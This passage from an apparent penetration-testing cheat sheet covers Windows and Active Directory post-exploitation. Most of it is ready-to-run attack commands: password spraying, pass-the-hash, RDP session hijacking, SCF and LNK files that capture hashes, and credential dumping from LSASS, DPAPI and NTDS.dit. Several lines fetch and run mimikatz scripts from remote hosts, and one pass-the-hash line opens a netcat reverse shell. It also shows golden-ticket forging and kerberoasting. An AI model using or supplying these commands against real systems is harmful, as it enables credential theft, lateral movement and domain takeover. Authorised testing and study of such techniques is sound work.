Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)
```
## Local enum  commands
```
ipconfig /all                ------ 查询本机IP段,所在域等  
net user                     ------ 本机用户列表  
net localgroup administrators            ------ 本机管理员[通常含有域用户]  
net user /domain                         ------ 查询域用户  
net group /domain                        ------ 查询域里面的工作组  
net group "domain admins" /domain        ------ 查询域管理员用户组  
net localgroup administrators /domain    ------ 登录本机的域管理员  
net localgroup administrators workgroup\user001 /add   ------域用户添加到本机  
net group "domain controllers" /domain        ------ 查看域控制器(如果有多台)  
net time /domain                   ------ 判断主域,主域服务器都做时间服务器  
net config workstation             ------ 当前登录域  
net session                        ------ 查看当前会话  
net use \\ip\ipc$ pawword /user:username      ------ 建立IPC会话[空连接-***]  
net share                          ------  查看SMB指向的路径[即共享]  
net view                           ------ 查询同一域内机器列表  
net view \\ip                      ------ 查询某IP共享  
net view /domain                   ------ 查询域列表  
net view /domain:domainname        ------ 查看workgroup域中计算机列表  
net start                          ------ 查看当前运行的服务  
net accounts                       ------  查看本地密码策略  
net accounts /domain               ------  查看域密码策略  
nbtstat –A ip                      ------netbios 查询  
netstat –an/ano/anb                ------ 网络连接查询  
route print                        ------ 路由表tasklist /V                        ----- 查看进程[显示对应用户]  
tasklist /S ip /U domain\username /P /V             ----- 查看远程计算机进程列表  
qprocess *                         ----- 类似tasklist  
qprocess /SERVER:IP                ----- 远程查看计算机进程列表  
nslookup –qt-MX Yahoo.com          ----- 查看邮件服务器  
whoami /all                        ----- 查询当前用户权限等  
set                                ----- 查看系统环境变量  
systeminfo                         ----- 查看系统信息  
qwinsta                            ----- 查看登录情况  
qwinsta /SERVER:IP                 ----- 查看远程登录情况  
fsutil fsinfo drives               ----- 查看所有盘符  
gpupdate /force                    ----- 更新域策略cmdkey /l  ----- 看是否保存了登陆凭证。
(攻击者会先查看管理员是否保留了登陆凭证,方便后续的凭证抓取。)    
echo %logonserver%                 ----- 查看登陆域  
gpresult /user svc_testldap /z     ----- Displays the Resultant Set of Policy (RSoP) information  
## The user does not have RSoP data. This is an error you get back from running GPRESULT /R and it happens because the user you're running this command with isn't logged on the system.  
gpresult [/s <system> [/u <username> [/p [<password>]]]] [/user [<targetdomain>\]<targetuser>] [/scope {user | computer}] {/r | /v | /z | [/x | /h] <filename> [/f] | /?}  
gpresult /s srvmain /u maindom\hiropln /p p@ssW23 /user targetusername /scope user /r  
```
## Local enum using wmic  
WMI is a subsystem of PowerShell that provides system administrators with powerful tools for system monitoring.  

Some of the uses for WMI are:  
- Status information for local/remote systems
- Configuring security settings on remote machines/applications
- Setting and changing user and group permissions
- Setting/modifying system properties
- Code execution
- Scheduling processes
- Setting up logging

```
wmic os list brief
wmic process list brief  
wmic group list brief  
wmic computersystem list  
wmic process list /format:list  
wmic ntdomain list /format:list  
wmic useraccount list /format:list  
wmic group list /format:list  
wmic sysaccount list /format:list  
wmic /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get *  
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"  
Get-WmiObject -class win32_OperatingSystem | Select Version.BuildNumber  
Get-WmiObject -Class Win32_OperatingSystem | Select SerialNumber  
Get-WmiObject -class win32_process | Select ProcessName, ProcessId  
Get-WmiObject -class win32_service  
Get-WmiObject -class win32_Bios  

Invoke-WmiMethod -Path "CIM_DataFile.Name='C:\users\public\spns.csv'" -Name Rename -ArgumentList "C:\Users\Public\kerberoasted_users.csv"
```

## Find generic writable folder for everyone and current user 
(Not checking on group name like IIS) also can try -Path $HOME  
```
$ErrorActionPreference= 'silentlycontinue';Get-ChildItem -Path c:\*\*\ -Force | where { $_.PSIsContainer -eq "TRUE"} | Where-Object { $acl = Get-Acl $_.FullName; $acl.Access | Where-Object { $_.identityreference -match "authenticated users|everyone|$env:username" -and $_.filesystemrights -match "full|modify|write"}}  
powershell -exec bypass -nop -C "$ErrorActionPreference=\"silentlycontinue\";Get-ChildItem -Path $HOME -Force | where { $_.PSIsContainer -eq \"TRUE\"} | Where-Object { $acl = Get-Acl $_.FullName; $acl.Access | Where-Object { $_.identityreference -match \"$env:username\" -and $_.filesystemrights -match \"Full\"}}"  
```

## Check recent modified file
```
Get-ChildItem -Path \\pdc\Shared\Accounting\*.* -Filter * | ? {$_.LastWriteTime -gt (Get-Date).AddDays(-1)}
```

## Get ACL for a Folder
script scans for directories under shared folder and gets acl(permissions) for all of them
```
$path = "\\pdc\Shared\folder"; dir -Recurse $path | where { $_.PsIsContainer } | % { $path1 = $_.fullname; Get-Acl $_.Fullname | % { $_.access | Add-Member -MemberType NoteProperty '.\Application Data' -Value $path1 -passthru }}  
```

## Get .NET version
```
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select PSChildName, Version, Release  
```

## Enum service
```
Get-Service | ? {$_.Status -eq "Running"} | select -First 2 | fl
Get-Service -name "*update*" | fl -auto
```

## Inspect network traffic  
```
tcpdump -i eth0 icmp  
/var/www/apache2/access.log  
  
netsh trace show interfaces  
netsh trace start capture=yes CaptureInterface="Ethernet" tracefile="C:\Users\user\Desktop\www\trace.etl" maxsize=10    # tcpdump  
netsh trace start capture=yes IPv4.Address=192.168.122.2  
netsh trace start capture=yes                             # cannot capture on localhost  
netsh trace stop  
etl2pcapng.exe trace.etl trace.pcapng                           # convert etl to pcapng - https://github.com/microsoft/etl2pcapng/
```
## Windows critical system services
```
Service	Description
smss.exe	Session Manager SubSystem. Responsible for handling sessions on the system.
csrss.exe	Client Server Runtime Process. The user-mode portion of the Windows subsystem.
wininit.exe	Starts the Wininit file .ini file that lists all of the changes to be made to Windows when the computer is restarted after installing a program.
logonui.exe	Used for facilitating user login into a PC
lsass.exe	The Local Security Authentication Server verifies the validity of user logons to a PC or server. It generates the process responsible for authenticating users for the Winlogon service.
services.exe	Manages the operation of starting and stopping services.
winlogon.exe	Responsible for handling the secure attention sequence, loading a user profile on logon, and locking the computer when a screensaver is running.
System	A background system process that runs the Windows kernel.
svchost.exe with RPCSS	Manages system services that run from dynamic-link libraries (files with the extension .dll) such as "Automatic Updates," "Windows Firewall," and "Plug and Play." Uses the Remote Procedure Call (RPC) Service (RPCSS).
svchost.exe with Dcom/PnP	Manages system services that run from dynamic-link libraries (files with the extension .dll) such as "Automatic Updates," "Windows Firewall," and "Plug and Play." Uses the Distributed Component Object Model (DCOM) and Plug and Play (PnP) services.
```
## Check hidden file
MOST system files or critical files are hidden  
```powershell
gci -hidden  
attrib -s -h -r /s /d  
```

## Inspect windows event  
https://github.com/RamblingCookieMonster/PowerShell  
```powershell
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName  //check account lockout  
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4688} -MaxEvents 10 | Get-WinEventData | select TimeCreated, e_CommandLine | ft -autosize -wrap    //a new process has been created  
```

## Windows setting
```
secpol.msc      # Local Security Policy  
gpedit.msc      # Group Policy Editor  
lusrmgr.msc     # Local Users and Groups  
services.msc    # Services Manager  
wf.msc          # Windows Firewall  
taskschd.msc    # Task Scheduler  
wmimgmt.msc     # WMI Management  
compmgmt.msc    # Computer Management  
devmgmt.msc     # Device Manager  
eventvwr.msc    # Event Viewer  
fsmgmt.msc      # Shared Folders  
regedit  
msconfig  
  
gpmc.msc	      # Group Policy Management  
gpme.msc	      # Group Policy Mangement Editor  
gptedit.msc	    # Group Policy Starter GPO Editor  
domain.msc	    # Active Directory Domains and Trust  
dsa.msc	        # Active Directory Users and Computers.  
dssite.msc	    # Active Directory Sites and Services  
iis.msc	        # Internet Information Services Manager  
iis6.msc	      # Internet Information Services Manager 6.0  
wsus.msc        # Update Services  
```

# Post Exploitation

## Identify the internal hosts
Get-DomainComputer
```
Get-DomainComputer | foreach-object {Resolve-IPAddress $_.cn}
```
Metasploit post module
```
use post/windows/gather/arp_scanner
```

## Password Spraying Attack  
```
crackmapexec smb 192.168.1.0/24 -u "ned.flanders_adm" -p "Lefthandedyeah!"  
crackmapexec smb ./host.list -u "ned.flanders_adm" -p "Lefthandedyeah!"  
crackmapexec ssh 172.16.1.0/24 -u "ned.flanders_adm" -p "Lefthandedyeah!"  
crackmapexec winrm 172.16.1.0/24 -u "ned.flanders_adm" -p "Lefthandedyeah!"  
crackmapexec mssql 172.16.1.0/24 -u "ned.flanders_adm" -p "Lefthandedyeah!"  
crackmapexec smb 172.16.2.102 -d "corp.local" -u "svc_devops" -H "aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178" --shares  
proxychains4 crackmapexec smb ./host.list --gen-relay-list ./NoSMBsign.txt  
crackmapexec smb 172.16.126.151 -u "imaginarybit" -p 'P@ssw0rd12345!' --local-auth  
  
sudo python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]  
sudo python3 RDPassSpray.py -U /root/Desktop/user.txt -p 123 -t 192.168.1.106  
sudo python3 RDPassSpray.py -u "ned.flanders_adm" -p "Lefthandedyeah!" -T host.list  
  
https://github.com/lanjelot/patator.git  
patator [module] host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt  
ssh_login  
ftp_login  
rdp_login  
mssql_login  
smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt  # Test every user (each line := login:rid:LM hash:NT hash).  
unzip_pass  
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017  
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt  
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login  
patator rdp_login host=192.168.101.128 user=tester password='testpass'      //doesnt support domain user well  
  
ncrack -vv --user <User> -P pwds.txt rdp://<IP>  
  
rdp_check.py lab/tester:password@192.168.101.128  
rdp_check.py lab/tester@192.168.101.128 -hashes aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178  
```
## check gpp password  
```
proxychains4 crackmapexec smb 172.16.126.192 -u nina -p 'Password123!#$' -d final.com -M gpp_password  
```
## no brute force  
```
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce --continue-on-success  
```
## SMB shares enumeration with known credentials  
save username and hashes to userpass.txt in format of "Administrator LMhash:NThash" or "Administrator password"  
```
IFS=$'\n'&&for i in $(cat ./userpass.txt);do echo "Enumeration with username $(echo $i | awk -F' ' '{print $1}')" && proxychains4 -f ../dc03.conf smbmap -d admin.offshore.com -u $(echo $i | awk -F' ' '{print $1}') -p $(echo $i | awk -F' ' '{print $2}') -H 172.16.4.31;done  
```
## Pass the Hash Attack  
```
crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH  
crackmapexec smb <target(s)> -u username -H NTHASH  
```
## Using CME Modules:   
```
cme smb -L  
cme <protocol> -M <module name> --options  
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'  
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M rdp -o ACTION='enable'  
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M bloodhound -o ACTION='enable'  
```
## NULL session  
```
crackmapexec smb <target(s)> -u '' -p ''  
```
## RDP Session Hijacking with tscon - connect to a different user in the same system - requires administrator  
```
query user    # get session name  
sc create hijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"    # sc create <process_name> binpath= "cmd.exe /k tscon <user 2_ID> /dest:<session_name>"  
net start hijack  
  
method 2: via task manager -> users -> connect -> enter credentials  
method 3: Mimikatz  
ts::sessions  
privilege::debug  
token::elevate  
ts::remote /id:1  
```
## SCF file attack
put the SCF file in a writable shared folder  
```
[Shell]  
Command=2  
IconFile=\\X.X.X.X\share\pentestlab.ico  
[Taskbar]  
Command=ToggleDesktop  

#add @ symbol in front of the filename will place the pentestlab.scf  
responder -wrf --lm -v -I eth0    //Running SMB1, Capture NTLM  
responder -wrf -v -I eth0         //Running SMB2, Capture Net-NTLM  
```
## lnk file attack
put the lnk file in a writable shared folder 
```
$objShell = New-Object - ComObject WScript.Shell  
$link = $objShell.CreateShortcut("C:\Malicous.lnk")  
$link.TargetPath = "\\attackerIP\@threat.png"  
$link.WindowStyle = 1  
$link.IconLocation = "%windir%\system32\shell32.dll, 3"  
$link.Description = "what ever"  
$link.HotKey = "Ctrl+Alt+O"  
$link.Save()  
```
# Dumping Credentials 
  
## Workstation Credentials Storage  
## WDigest  
This is a legacy protocol used to authenticate users in Windows. When enabled, LSASS keeps a plain-text copy of logged in user’s password in memory.   
While the service is disabled by default nowadays, it still exists in the latest versions of Windows, and attackers often enable it in order to steal credentials.  
"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /d 1"
  
## Security Accounts Manager database (SAM)  
The SAM database is stored as a file on the local hard disk drive, and it is the authoritative credential store for local accounts on each Windows computer.  
The SAM database stores information on each account, including the user name and the NT password hash.  
  
## Local Security Authority Subsystem Service (LSASS)  
The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions.  
Reversibly encrypted plaintext, Kerberos tickets (TGTs, service tickets), NT hash, LM hash  
  
## LSA secrets on the hard disk drive  
A Local Security Authority (LSA) secret is a secret piece of data that is accessible only to SYSTEM account processes.  
Account password for the computer’s AD DS account  
Account passwords for Windows services that are configured on the computer  
Account passwords for configured scheduled tasks  
Account passwords for IIS application pools and websites  
  
## Credential Manager store  
These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI).  
  
## Kerberos  
The Kerberos protocol was specifically designed for strong, secure authentication. It does so through a ticketing system, granting various permissions to users and services.   
Attacks against Kerberos generally involve forging or injecting stolen Kerberos tickets to gain access.  
  
## Cached Domain Credentials in Registry  
  
====================================================================================================================================================================================================================  
## Domain Controller Credentials Storage  
## AD DS database (NTDS.DIT)  
The Active Directory Domain Services (AD DS) database is the authoritative store of credentials for all user and computer accounts in an AD DS domain.  
NT hash for the current password  
NT hashes for password history (if configured)  
  
## Group Policy Preference files  
This Windows tool lets administrators roll up domain policies to include embedded credentials, making administration easier.  
These policies are generally stored in a share called SYSVOL, which any domain user can view, and potentially decrypt.  
  
## DCSync  
Instead of a location, DCSync is a technique where an attacker takes advantage of the way domain controllers handle available API calls.   
In short, the attacker mimics the behavior of another domain controller through API calls and gets the controller to send over credential hashes that can be used in further attacks.  
  
====================================================================================================================================================================================================================  
## check whether protections such as Credential Guard/protected process are configured and running  
mimikatz > version  
  
## Requires administrator access with debug or Local SYSTEM rights  
privilege::debug  
  
## Escalate to SYSTEM  
token::whoami  
token::elevate  
or  
psexec64.exe -i -s powershell.exe  
  
## Dump cached domain credentials - Impacket offline  
reg.exe save hklm\sam c:\temp\sam.save  
reg.exe save hklm\security c:\temp\security.save  
reg.exe save hklm\system c:\temp\system.save  
  
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL  
lsadump::cache  
lsadump::secrets  
  
If the autologon functionality is needed, consider using the Sysinternals utility "Autologon" (which will store the password encrypted in the registry)   
instead of the Windows built-in one (which needs the password to be saved in plain-text in the registry).  
  
## Dump SAM NTLM - online under SYSTEM priv  
meterpreter> hashdump  
run post/windows/gather/hashdump  
run post/windows/gather/smart_hashdump  
run post/windows/gather/credentials/credential_collector  
run post/windows/gather/credentials/sso  
  
lsadump::sam  

## PostDump
perform a memory dump (lsass) using several technics to bypass EDR hooking and lsass protection.
https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump
  
## Download mimikatz binary  
powershell.exe -exec Bypass -noexit -C "(New-Object Net.WebClient).DownloadFile('http://172.16.1.5:30080/mimikatz.exe','c:\Users\Administrator\Downloads\mimikatz.exe')"  
  
## Invoke-MassMimikatz  
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://10.10.14.2/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"  
  
## Invoke-Kerberoast with Hashcat Output  
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://10.10.14.2//Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"  
  
## Invoke Mimikatz  
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://10.10.14.2/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"  
  
## Import Mimikatz Module  
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://10.10.14.2/Invoke-Mimikatz.ps1')"  
  
## Perform DcSync attack  
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:demodomain /user:sqladmin"'  
  
## Manual Procdump for offline mimikatz  
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp  
.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp  
.\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full
  
PS> C:\path\to\procdump64.exe -accepteula -ma lsass.exe lsass.dmp; certutil -encode C:\path\to\lsass.dmp C:\path\to\file.b64    # avoid lsass.dmp deleted by system automaticly  
meterpreter download file.b64  
certutil -decode file.b64 file.dmp  
  
## Dump credentials from lsass process in memory  
sekurlsa::minidump c:\temp\file.dmp  
sekurlsa::LogonPasswords      
  
## meterpreter - load kiwi  
meterpreter > kiwi_cmd sekurlsa::logonPasswords  
meterpreter > kiwi_cmd dpapi::cred  
meterpreter > kiwi_cmd dpapi::vault  
  
## remotely run mimikatz using psexec64.exe  
PsExec64.exe \\server01 -f -s -c mimikatz.exe  
  
## Pass-the-Hash with Mimikatz  
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND  
  
## DPAPI - Chrome Cookies/Login Data, the Windows Credential Manager/Vault (e.g. saved IE/Edge logins and file share/RDP passwords), and Remote Desktop Connection Manager .rdg files  
The master key needs to be decrypted using the user’s password OR the domain backup key. The master key is used to decrypt any DPAPI data blobs.  
C:\Users\<USER>\AppData\Local\Microsoft\Credentials\    # Credential files for users  
C:\Users\<USER>\AppData\Local\Microsoft\Protect\    # Masterkey files (masterkey,backupkey,domainkey) for users  
%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\ # Credential files for system credentials  
%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Protect\    # Masterkey files (masterkey,backupkey,domainkey) for system credentials  
C:\Users\<USER>\AppData\Local\Microsoft\Vault\<VAULT_GUID>\    # Windows Vaults  
  
## Master key stored at C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>, <SID> is the user’s security identifier, <GUID> is the name of the master key  
dpapi::masterkey /in:<MASTERKEY_LOCATON> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected  
  
## Decrypt scheduled task credentials online - under AUTORITE NT\System - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials  
sekurlsa::dpapi    # extract the system’s DPAPI key out of memory  
dpapi::cred /in:”%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials”  
dpapi::cred /in:%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20883E9542812A0F904C /masterkey:0a942e9dfc93424608...  
  
## Decrypt credential manager saved credentials - not recommended - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials  
vault::list    # list/attempt to decrypt credentials from \AppData\Local\Microsoft\Vault\  
vault::cred    # list/attempt to decrypt credentials from \AppData\Local\Microsoft\Credentials\  
  
vault::cred /patch    # not recommended - use the other options at below  
  
## Code Execution in Target User’s Context - decrpyed under same user's session  
dpapi::chrome /in:”%localappdata%\Google\Chrome\User Data\Default\Cookies” /unprotected  
dpapi::cred /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /unprotected  
  
## Administrative Access on a Machine the Target User is Currently Logged In On  
sekurlsa::dpapi    # extract all DPAPI keys from memory for users currently logged into system  
dpapi::chrome /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /masterkey:f35cfc2b44aedd7…  
dpapi::cred /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /masterkey:f35cfc2b44aedd7…  
  
## Administrative Access on a Machine the Target User is NOT Currently Logged In On - with credentials  
dpapi::masterkey /in:<MASTERKEY_LOCATON> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected  
dpapi::chrome /in:”%localappdata%\Google\Chrome\User Data\Default\Cookies” /unprotected  
dpapi::cred /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /unprotected  
  
## Administrative Access on a Machine the Target User is NOT Currently Logged In On - without credentials  
dpapi::masterkey /in:”C:\Users\dfm.a\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1110\ca748af3-8b95-40ae-8134-cb9534762688″ /rpc    # ask domain controller to decrpy master key  
dpapi::chrome /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /masterkey:f35cfc2b44aedd7…  
dpapi::cred /in:”C:\Users\harmj0y\AppData\Local\Google\Chrome\User Data\Default\Cookies” /masterkey:f35cfc2b44aedd7…  
  
## DPAPI - Elevated Domain Privilege  
lsadump::backupkeys /system:<DOMAIN CONTROLLER> /export    #.pvk private key can be used to decrypt ANY domain user masterkeys  
dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk  
dpapi::chrome /in:Cookies /masterkey:f35cfc2b44aedd7…  
  
## Check current found masterkey  
dpapi::cache  
  
## Decrpyt Encrypting File System (EFS) - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files  
cipher /c "d:\Users\Gentil Kiwi\Documents\encrypted.txt"    # print out certificate & private key with digest B53C6DE283C00203587A03DD3D0BF66E16969A55  
## Obtain the certificate and its public key,   
crypto::system /file:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B53C6DE283C00203587A03DD3D0BF66E16969A55" /export    # obtained publicKey B53C6DE283C00203587A03DD3D0BF66E16969A55.der  
## Check key provider info: Key Container ffb75517-bc6c-4a40-8f8b-e2c555e30e34 whether the private key's pUniqueName matches the Key Container  
dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b"   # Found guidMasterKey {1eccdbd2-4771-4360-8b19-9d6060a061dc}  
## Decrypting the masterkey  
dpapi::masterkey /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Protect\S-1-5-21-494464150-3436831043-1864828003-1001\1eccdbd2-4771-4360-8b19-9d6060a061dc" /password:waza1234/    # or using NTLM hash for domain accounts, sha1 hash for local account, or domain backup key. Found decrypted master key  
## Decrypting the private key using decrypted masterkey  
dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b    # obtained privateKey raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk  
## Building the correct PFX  
openssl x509 -inform DER -outform PEM -in B53C6DE283C00203587A03DD3D0BF66E16969A55.der -out public.pem  
openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -out private.pem  
openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx  
## Installing the PFX  
certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot  
## Data access  
type "d:\Users\Gentil Kiwi\Documents\encrypted.txt"  
  
## LaZagne - The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. - https://github.com/AlessandroZ/LaZagne  
laZagne.exe all         # Only extract the credentials related to current user  
laZagne.exe browsers  
laZagne.exe browsers -firefox  
laZagne.exe all -oA -output C:\Users\test\Desktop  
  
## SharpDPAPI.exe  
SharpDPAPI.exe backupkeys /file:key.pvk /server:dc02.dev.admin.offshore.com    # grab domain private key from domain controller  
  
## SharpChrome.exe  
SharpChrome.exe logins /unprotect         # credentials store using current user  
SharpChrome.exe cookies /unprotect        # credentials store using current user  
SharpChrome.exe statekeys /file:key.pvk   # credentials store in another user  
SharpChrome.exe logins /statekey:[ASD8S9A6...SDA789DSA] /file:key.pvk  
SharpChrome.exe cookies /statekey:[ASD8S9A6...SDA789DSA] /file:key.pvk  
  
## Dumping Active Directory credentials locally - on DC  
lsadump::lsa /inject  
or  
lsadump::lsa /patch  
or  
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q  
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local    # Extract Hashes from NTDS.dit using Impacket  
secretsdump.py -pwd-last-set -user-status -history -ntds ./ntds.dit -security SECURITY -system SYSTEM local  
  
## Powershell History  
C:\Users\{username}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\  
## Recently Run Commands  
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU  
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU  

## Crack password protected office documents  
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/office2john.py  
python office2john.py dummy.docx > hash.txt  
cat hash.txt    //identify the version of office  
hashcat -a 0 -m 9400 --username -o cracked_pass.txt hash.txt rockyou.txt  
  
####################################################################################################  
######################################     kerberos attacking    ###################################  
####################################################################################################  
  
## Pass-The-Ticket  
kerberos::list  
kerberos::list /export  
## KrbTGT tickets get cached ONLY IF Administrator has logged on before on a Unconstrained Delegation computer  
kerberos::ptt TGTticket.kirbi  
misc::cmd    # perform the actions as the user that passed the ticket  
  
## Pass The Hash  
## The computer account WEB-WIN01$ is part of "domain admins" group, once pwned the computer  
sekurlsa::pth /user:WEB-WIN01$ /domain:corp.local /ntlm:e3d78bc48d069bba3d3e34b0cae59547 /run:"c:\users\cyber_adm\downloads\nc.exe 10.10.14.6 4444 -e C:\WINDOWS\System32\cmd.exe"  
rubeus.exe s4u /user:FS02$ /domain:dev.ADMIN.OFFSHORE.COM /dc:dc02.dev.ADMIN.OFFSHORE.COM /rc4:25CB75FB3F857DE4BB08FEDDCA639D2D /impersonateuser:Administrator /msdsspn:cifs/DC02.dev.ADMIN.OFFSHORE.COM /ptt  
  
## Kerberos Golden Ticket  
lsadump::lsa /inject /name:krbtgt    # After conpromise the domain controller,get NTLM of kerberos account  
Domain : DEV /S-1-5-21-1416445593-394318334-2645530166  
NTLM: 9404def404bc198fd9830a3483869e78  
## Creating a forged golden ticket that automatically gets injected in current logon session's memory  
kerberos::golden /domain:dev.ADMIN.OFFSHORE.COM /sid:S-1-5-21-1416445593-394318334-2645530166 /rc4:9404def404bc198fd9830a3483869e78 /user:newAdmin /id:500 /ptt  
klist    # Checking if the ticket got created  
pushd \\WS03.dev.ADMIN.OFFSHORE.COM\c$  
  
## Service Account Password Cracking  
GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat.  
GetUserSPNs.py -request -dc-ip 172.16.1.5 corp.local/svc_opmanager  
$krb5tgs$23$  
hashcat -m 13100 krb5tgs.hash rockyou  
  
## Pass the Cache - abusing cached Kerberos .ccache tickets discovered on a Linux-based jump-box  
Python ms14-068.py –u [USERNAME] –s [USERSID] –p [USER PASSWORD] –d [DOMAIN CONTROLLER IP]    # request ccache from DC  
Kerberos::ptc [TICKET NAME]     # perform pass the cache on windows machine  
  
## kerberoasting - extract and crack NTLM hash for service account reside in a TGS - required an authenticated domain user  
## Step 1 – Obtain a list of SPN values for user accounts - https://github.com/nidem/kerberoast  
setspn -T corp.local -Q */*  
setspn -l hostname    # To view a list of the SPNs that a computer has registered with Active Directory  
## Step 2 – Request Service Tickets for service account SPNs  
Add-Type –AssemblyName System.IdentityModel  
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList ‘MSSQLSvc/corp.local:1433’  
or    #list all  
PS C:\> Add-Type -AssemblyName System.IdentityModel    
PS C:\> setspn.exe -T corp.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }    
## Step 3 - Find the SPN which is running on the target host. (The NTLM of the SPN is required for creating silver ticket)  
For eg. MSSQLsvc/ql01.corp.local:1433 @ CORP.LOCAL  
## Step 4 – Extract Service Tickets Using Mimikatz  
kerberos::list /export  
or  
